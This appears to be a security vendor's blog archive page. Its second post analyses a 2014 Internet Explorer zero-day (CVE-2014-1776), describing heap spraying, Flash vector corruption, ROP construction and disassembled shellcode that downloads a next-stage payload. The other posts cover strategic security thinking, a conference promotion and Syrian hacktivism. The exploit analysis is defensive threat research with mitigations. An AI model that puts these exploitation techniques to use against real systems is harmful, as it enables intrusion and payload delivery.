Category Archives: Uncategorized

Introduction to Strategic Thought

| By | Business of Security, Executive Perspectives, Security Perspective, Uncategorized |
Comments
0

I plan to address strategic thought as applied to digital security in a series of posts. Here I would like to briefly introduce the concept and offer a simple example.

Joint Publication 1 (JP-1), Doctrine for the Armed Forces of the United States, helps illuminate the strategic approach to digital security. JP-1 defines three levels of warfare: strategic, operational and tactical. Above the strategic level one can place the overall goal of the digital security program, as one might place the overall goal of a military or political endeavor. Below the tactical level one can similarly place tools or technology – the weapons one might employ when conducting tactical maneuvers. Taken as a whole, the five levels appear as shown in Figure 1.

Figure 1. Five Levels of Strategic Security

Figure 1. Five Levels of Strategic Security

Using a strategic security framework enables a digital defender to build a more effective and durable program. A strategic security system doesn’t start with tools and tactics; instead, it begins by setting one or more overall mission goals. The strategy-minded chief information security officer (CISO) obtains executive buy-in to those goals, which works at a level understood by technicians and non-technicians alike. Next the CISO develops strategies to implement those goals, organizes and runs campaigns and operations to support the strategies, helps his or her team use tactics to realize the campaigns and operations, and procures tools and technology to equip the team.

Figure 2 shows an example of one strategic security approach to minimize loss due to intrusions, using a strategy of rapid detection, response, and containment, along with network security monitoring-inspired operations/campaigns, tactics and tools.

Figure 2. Five Levels of Strategic Security Example

Figure 2. Five Levels of Strategic Security Example

Most security professionals – and by association policymakers and leaders taking advice from those practitioners and engineers – fixate on the tools, and to a lesser degree, the tactics of the digital security problem. Goals, strategies and campaigns aren’t usually a consideration because technicians, administrators, programmers and the like spend their time working with tools. The extent of their tactical involvement is thinking about creative ways to use their tools. The communities that tend to think in terms of goals, strategies and campaigns – think tanks, policy analysts and so on – have traditionally not engaged with the technicians to bring the entire strategic security approach to bear on modern challenges.

As shown in Figure 2, “detecting intruders” is actually shorthand for a rich strategic security program – one whose goal is minimizing loss through a strategy of rapid incident detection, response and containment. Security teams run operations to match threat intelligence against security event data and hunt for novel intruders as needed. They tactically collect, analyze, escalate and resolve incidents and the related data using tools suited for those functions.

It is crucial, however, that the ultimate goals and strategy remained linked with the tools at the bottom of the process. If that chain decouples, the outcome could be disastrous, where technical reality makes strategic theory obsolete. For example, a program built on monitoring the network will fail if all network traffic is encrypted. The tools at the bottom of the process will not be able to “see” the contents of network traffic and will be less effective when trying to identify suspicious and malicious activity. In this dysfunctional case, the tools’ inability to deliver required data to the personnel conducting tactical endeavors and operational campaigns will prevent the program goal from being achieved.

In future posts, I will elaborate on these concepts to demonstrate how they improve enterprise security.

Note: This post is adapted from a research paper by the author, published through The Brookings Institution as Strategy, Not Speed: What Today’s Digital Defenders Must Learn From Cybersecurity’s Early Thinkers.

New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks

| By , and | Advanced Malware, Exploits, Targeted Attack, Uncategorized

Summary

FireEye Research Labs identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. This zero-day bypasses both ASLR and DEP. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue.

Threat actors are actively using this exploit in an ongoing campaign which we have named “Operation Clandestine Fox.” However, for many reasons, we will not provide campaign details. But we believe this is a significant zero day as the vulnerable versions represent about a quarter of the total browser market. We recommend applying a patch once available.
According to NetMarket Share, the market share for the targeted versions of IE in 2013 were:

IE 9 13.9%
IE 10 11.04%
IE 11 1.32%

Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market. The vulnerability, however, does appear in IE6 through IE11 though the exploit targets IE9 and higher.

The Details

The exploit leverages a previously unknown use-after-free vulnerability, and uses a well-known Flash exploitation technique to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.

Exploitation

• Preparing the heap

The exploit page loads a Flash SWF file to manipulate the heap layout with the common technique heap feng shui. It allocates Flash vector objects to spray memory and cover address 0×18184000. Next, it allocates a vector object that contains a flash.Media.Sound() object, which it later corrupts to pivot control to its ROP chain.

• Arbitrary memory access

The SWF file calls back to Javascript in IE to trigger the IE bug and overwrite the length field of a Flash vector object in the heapspray. The SWF file loops through the heapspray to find the corrupted vector object, and uses it to again modify the length of another vector object. This other corrupted vector object is then used for subsequent memory accesses, which it then uses to bypass ASLR and DEP.

• Runtime ROP generation

With full memory control, the exploit will search for ZwProtectVirtualMemory, and a stack pivot (opcode 0×94 0xc3) from NTDLL. It also searches for SetThreadContext in kernel32, which is used to clear the debug registers. This technique, documented here, may be an attempt to bypass protections that use hardware breakpoints, such as EMET’s EAF mitigation.

With the addresses of the aforementioned APIs and gadget, the SWF file constructs a ROP chain, and prepends it to its RC4 decrypted shellcode. It then replaces the vftable of a sound object with a fake one that points to the newly created ROP payload. When the sound object attempts to call into its vftable, it instead pivots control to the attacker’s ROP chain.

• ROP and Shellcode

The ROP payload basically tries to make memory at 0×18184000 executable, and to return to 0x1818411c to execute the shellcode.

0:008> dds eax
18184100  770b5f58 ntdll!ZwProtectVirtualMemory
18184104  1818411c
18184108  ffffffff
1818410c  181840e8
18184110  181840ec
18184114  00000040
18184118  181840e4

Inside the shellcode, it saves the current stack pointer to 0×18181800 to safely return to the caller.

mov     dword ptr ds:[18181800h],ebp

Then, it restores the flash.Media.Sound vftable and repairs the corrupted vector object to avoid application crashes.

18184123 b820609f06      mov     eax,69F6020h
18184128 90              nop
18184129 90              nop
1818412a c700c0f22169    mov     dword ptr [eax],offset Flash32_11_7_700_261!AdobeCPGetAPI+0x42ac00 (6921f2c0)
18184133 b800401818      mov     eax,18184000h
18184138 90              nop
18184139 90              nop
1818413a c700fe030000    mov     dword ptr [eax],3FEh ds:0023:18184000=3ffffff0

The shellcode also recovers the ESP register to make sure the stack range is in the current thread stack base/limit.

18184140 8be5            mov     esp,ebp
18184142 83ec2c          sub     esp,2Ch
18184145 90              nop
18184146 eb2c            jmp     18184174

The shellcode calls SetThreadContext to clear the debug registers. It is possible that this is an attempt to bypass mitigations that use the debug registers.

18184174 57              push    edi
18184175 81ece0050000    sub     esp,5E0h
1818417b c7042410000100  mov     dword ptr [esp],10010h
18184182 8d7c2404        lea     edi,[esp+4]
18184186 b9dc050000      mov     ecx,5DCh
1818418b 33c0            xor     eax,eax
1818418d f3aa            rep stos byte ptr es:[edi]
1818418f 54              push    esp
18184190 6afe            push    0FFFFFFFEh
18184192 b8b308b476      mov     eax,offset kernel32!SetThreadContext (76b408b3)
18184197 ffd0            call    eax

The shellcode calls URLDownloadToCacheFileA to download the next stage of the payload, disguised as an image.

Mitigation

Using EMET may break the exploit in your environment and prevent it from successfully controlling your computer. EMET versions 4.1 and 5.0 break (and/or detect) the exploit in our tests.
Enhanced Protected Mode in IE breaks the exploit in our tests. EPM was introduced in IE10.
Additionally, the attack will not work without Adobe Flash. Disabling the Flash plugin within IE will prevent the exploit from functioning.

Threat Group History

The APT group responsible for this exploit has been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past. They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure. They have a number of backdoors including one known as Pirpi that we previously discussed here. CVE-2010-3962, then a 0-day exploit in Internet Explorer 6, 7, and 8 dropped the Pirpi payload discussed in this previous case.

As this is still an active investigation we are not releasing further indicators about the exploit at this time.

Acknowledgement: We thank Christopher Glyer, Matt Fowler, Josh Homan, Ned Moran, Nart Villeneuve and Yichong Lin for their support, research, and analysis on these findings.

InfoSecurity Europe 2014: Cybersecurity for the Masses

| By | Business of Security, Security Perspective, Uncategorized

InfoSecurity Europe is the biggest security event and most important date on the calendar for information security professionals across Europe. The event aims to break through the noise and provide the European audience with all the necessary information to better understand cyber threats to their networks. Join FireEye experts and learn how to prepare for a new frontier of advanced attackers:

  • Visit stand J60 and check out FireEye’s Geek Bar. A certified geek will analyze your portable device to determine if you’ve received any malware. The live demonstration can prove useful to better understand and identify potential threats to your network.
  • Join FireEye Director of Technology Strategy Jason Steer, SI Technical Lead Simon Mullis, and Greg Day, EMEA CTO among others, as they discuss the threat landscape and walk attendees through interactive, educational workshops and presentations. Join us on our stand to understand the threat landscape – presentations every 30 minutes all 3 days.
  • Senior Director of Market Research at FireEye Rob Rachwald will be speaking on Wednesday, April 30, where he’ll cover the nitty gritty of sandbox evasion. Mr. Rachwald’s presentation will help the audience gain an overview of various sandboxing techniques, understand current sandbox bypass methods, as well as identify best practices to optimize malware detection.
  • Mandiant's Director, David Damato and Technical Director, Ryan Kazanciyan will be speaking on Wednesday, April 30. Drawing from the speakers’ first-hand experiences and case-studies, this presentation will highlight lessons learned from many years of responding to targeted attacks by nation state actors and other groups.
  • FireEye SVP and COO Kevin Mandia will make a special appearance on Wednesday, April 30 to discuss FireEye’s recent acquisition of Mandiant, as well as to discuss today’s changing threat landscape.
  • The FireEye team will also release the latest findings from Mandiant’s annual M-Trends report and European ATR research report. The results offer visibility into motives, approaches, and different skill levels of attackers both in Europe and around the globe.
  • Participate in FireEye’s photo contest and have the opportunity to win an Apple® gift card worth £250! Look around London and you will see FireEye branded taxis zipping around the city. Grab your camera or smart phone and take a picture of you and the taxi. Submit your photo to helena.brito@fireeye.com and your photo will be posted to FireEye’s Facebook page. You will also be automatically entered into the contest.

FireEye Taxi

Stop by Stand J60 to learn more about the newly expanded FireEye Security Platform, which integrates expertise from Mandiant and is designed to give customers one solution to go from threat alert to remediation. We’ll have live demonstrations of all the new FireEye products. In the mean time, be sure to follow @FireEye for the latest threat research and updates from the company.

We hope to see you in London the week of April 29 through May 1. If you are unable to attend, check back on the blog for interviews and insights from the conference. You can register for a free entry ticket by clicking HERE – your badge will arrive with “FireEye Guest” printed on the bottom.

Syria 1982, Syria 2013: A Tale of Two Revolutions

| By | Uncategorized

Today, as international intervention in the Syrian conflict is fast approaching, the phenomenon of the world’s “patriotic hackers” (see Chechnya, Kosovo, Estonia, Georgia, etc.) continues to grow, with the pro-government “Syrian Electronic Army” believed responsible for attacks on Twitter and the New York Times.

The Internet has changed everything, including our geopolitical “battlespace.” In 1982, during a previous Syrian uprising in the city of Hama, the government obliterated parts of the city with artillery fire and killed “many thousands” of civilians. But because the government had “cut all telephone and road communication with the city” (according to renowned Syria expert Robert Fisk) it was many weeks before the extent of the atrocity was discovered. I visited Hama in 1988, and the entire story was recounted to me by a complete stranger as we strolled past countless buildings strewn with bullet holes. Continue reading »